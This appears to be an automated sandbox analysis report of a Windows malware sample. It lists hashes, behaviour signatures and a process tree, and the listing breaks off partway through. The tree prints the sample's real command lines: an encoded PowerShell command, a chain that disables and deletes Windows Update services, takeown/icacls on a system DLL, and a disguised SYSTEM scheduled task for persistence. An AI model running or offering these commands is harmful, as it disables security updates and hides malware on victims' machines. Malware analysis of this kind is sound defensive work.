Analysis
-
max time kernel
268s -
max time network
175s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
10-05-2022 04:50
Static task
static1
Behavioral task
behavioral1
Sample
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
Resource
win7-20220414-en
General
-
Target
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
-
Size
2.0MB
-
MD5
79dbc1a54d33366681f1e926d565cad4
-
SHA1
907cf0ec6784bf140f9759d6931d3697da0fc229
-
SHA256
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
-
SHA512
6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Executes dropped EXE 1 IoCs
Processes:
services.exepid process 4352 services.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 3692 takeown.exe 4484 icacls.exe 3472 takeown.exe 4848 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 3692 takeown.exe 4484 icacls.exe 3472 takeown.exe 4848 icacls.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 3460 set thread context of 4844 3460 conhost.exe conhost.exe -
Drops file in Program Files directory 2 IoCs
Processes:
conhost.exedescription ioc process File created C:\Program Files\Windows\services.exe conhost.exe File opened for modification C:\Program Files\Windows\services.exe conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4776 reg.exe 4952 reg.exe 5068 reg.exe 5064 reg.exe 4580 reg.exe 3348 reg.exe 5020 reg.exe 1012 reg.exe 4320 reg.exe 3172 reg.exe 4740 reg.exe 4508 reg.exe 2900 reg.exe 1804 reg.exe 2160 reg.exe 4948 reg.exe 2136 reg.exe 4032 reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exepid process 4736 powershell.exe 4736 powershell.exe 4736 powershell.exe 4700 conhost.exe 1088 powershell.exe 1088 powershell.exe 1088 powershell.exe 3460 conhost.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
powershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exedescription pid process Token: SeDebugPrivilege 4736 powershell.exe Token: SeIncreaseQuotaPrivilege 4736 powershell.exe Token: SeSecurityPrivilege 4736 powershell.exe Token: SeTakeOwnershipPrivilege 4736 powershell.exe Token: SeLoadDriverPrivilege 4736 powershell.exe Token: SeSystemProfilePrivilege 4736 powershell.exe Token: SeSystemtimePrivilege 4736 powershell.exe Token: SeProfSingleProcessPrivilege 4736 powershell.exe Token: SeIncBasePriorityPrivilege 4736 powershell.exe Token: SeCreatePagefilePrivilege 4736 powershell.exe Token: SeBackupPrivilege 4736 powershell.exe Token: SeRestorePrivilege 4736 powershell.exe Token: SeShutdownPrivilege 4736 powershell.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeSystemEnvironmentPrivilege 4736 powershell.exe Token: SeRemoteShutdownPrivilege 4736 powershell.exe Token: SeUndockPrivilege 4736 powershell.exe Token: SeManageVolumePrivilege 4736 powershell.exe Token: 33 4736 powershell.exe Token: 34 4736 powershell.exe Token: 35 4736 powershell.exe Token: 36 4736 powershell.exe Token: SeDebugPrivilege 4700 conhost.exe Token: SeTakeOwnershipPrivilege 3692 takeown.exe Token: SeDebugPrivilege 1088 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1088 powershell.exe Token: SeIncreaseQuotaPrivilege 1088 powershell.exe Token: SeSecurityPrivilege 1088 powershell.exe Token: SeTakeOwnershipPrivilege 1088 powershell.exe Token: SeLoadDriverPrivilege 1088 powershell.exe Token: SeSystemtimePrivilege 1088 powershell.exe Token: SeBackupPrivilege 1088 powershell.exe Token: SeRestorePrivilege 1088 powershell.exe Token: SeShutdownPrivilege 1088 powershell.exe Token: SeSystemEnvironmentPrivilege 1088 powershell.exe Token: SeUndockPrivilege 1088 powershell.exe Token: SeManageVolumePrivilege 1088 powershell.exe Token: SeDebugPrivilege 3460 conhost.exe Token: SeTakeOwnershipPrivilege 3472 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.execonhost.execmd.execmd.execmd.execmd.exeservices.exedescription pid process target process PID 4016 wrote to memory of 4700 4016 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe conhost.exe PID 4016 wrote to memory of 4700 4016 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe conhost.exe PID 4016 wrote to memory of 4700 4016 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe conhost.exe PID 4700 wrote to memory of 2952 4700 conhost.exe cmd.exe PID 4700 wrote to memory of 2952 4700 conhost.exe cmd.exe PID 2952 wrote to memory of 4736 2952 cmd.exe powershell.exe PID 2952 wrote to memory of 4736 2952 cmd.exe powershell.exe PID 4700 wrote to memory of 2784 4700 conhost.exe cmd.exe PID 4700 wrote to memory of 2784 4700 conhost.exe cmd.exe PID 2784 wrote to memory of 3472 2784 cmd.exe sc.exe PID 2784 wrote to memory of 3472 2784 cmd.exe sc.exe PID 2784 wrote to memory of 4848 2784 cmd.exe sc.exe PID 2784 wrote to memory of 4848 2784 cmd.exe sc.exe PID 2784 wrote to memory of 1648 2784 cmd.exe sc.exe PID 2784 wrote to memory of 1648 2784 cmd.exe sc.exe PID 2784 wrote to memory of 3052 2784 cmd.exe sc.exe PID 2784 wrote to memory of 3052 2784 cmd.exe sc.exe PID 2784 wrote to memory of 3456 2784 cmd.exe sc.exe PID 2784 wrote to memory of 3456 2784 cmd.exe sc.exe PID 2784 wrote to memory of 4776 2784 cmd.exe reg.exe PID 2784 wrote to memory of 4776 2784 cmd.exe reg.exe PID 2784 wrote to memory of 2160 2784 cmd.exe reg.exe PID 2784 wrote to memory of 2160 2784 cmd.exe reg.exe PID 2784 wrote to memory of 4948 2784 cmd.exe reg.exe PID 2784 wrote to memory of 4948 2784 cmd.exe reg.exe PID 2784 wrote to memory of 5064 2784 cmd.exe reg.exe PID 2784 wrote to memory of 5064 2784 cmd.exe reg.exe PID 2784 wrote to memory of 2136 2784 cmd.exe reg.exe PID 2784 wrote to memory of 2136 2784 cmd.exe reg.exe PID 2784 wrote to memory of 3692 2784 cmd.exe takeown.exe PID 2784 wrote to memory of 3692 2784 cmd.exe takeown.exe PID 4700 wrote to memory of 2792 4700 conhost.exe cmd.exe PID 4700 wrote to memory of 2792 4700 conhost.exe cmd.exe PID 2784 wrote to memory of 4484 2784 cmd.exe icacls.exe PID 2784 wrote to memory of 4484 2784 cmd.exe icacls.exe PID 2792 wrote to memory of 4896 2792 cmd.exe schtasks.exe PID 2792 wrote to memory of 4896 2792 cmd.exe schtasks.exe PID 2784 wrote to memory of 4580 2784 cmd.exe reg.exe PID 2784 wrote to memory of 4580 2784 cmd.exe reg.exe PID 2784 wrote to memory of 3348 2784 cmd.exe reg.exe PID 2784 wrote to memory of 3348 2784 cmd.exe reg.exe PID 2784 wrote to memory of 3172 2784 cmd.exe reg.exe PID 2784 wrote to memory of 3172 2784 cmd.exe reg.exe PID 2784 wrote to memory of 5020 2784 cmd.exe reg.exe PID 2784 wrote to memory of 5020 2784 cmd.exe reg.exe PID 2784 wrote to memory of 5012 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 5012 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 3380 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 3380 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 4932 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 4932 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 4288 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 4288 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 3236 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 3236 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 3476 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 3476 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 4492 2784 cmd.exe schtasks.exe PID 2784 wrote to memory of 4492 2784 cmd.exe schtasks.exe PID 4700 wrote to memory of 3816 4700 conhost.exe cmd.exe PID 4700 wrote to memory of 3816 4700 conhost.exe cmd.exe PID 3816 wrote to memory of 4628 3816 cmd.exe schtasks.exe PID 3816 wrote to memory of 4628 3816 cmd.exe schtasks.exe PID 4352 wrote to memory of 3460 4352 services.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Program Files\Windows\services.exe"C:\Program Files\Windows\services.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
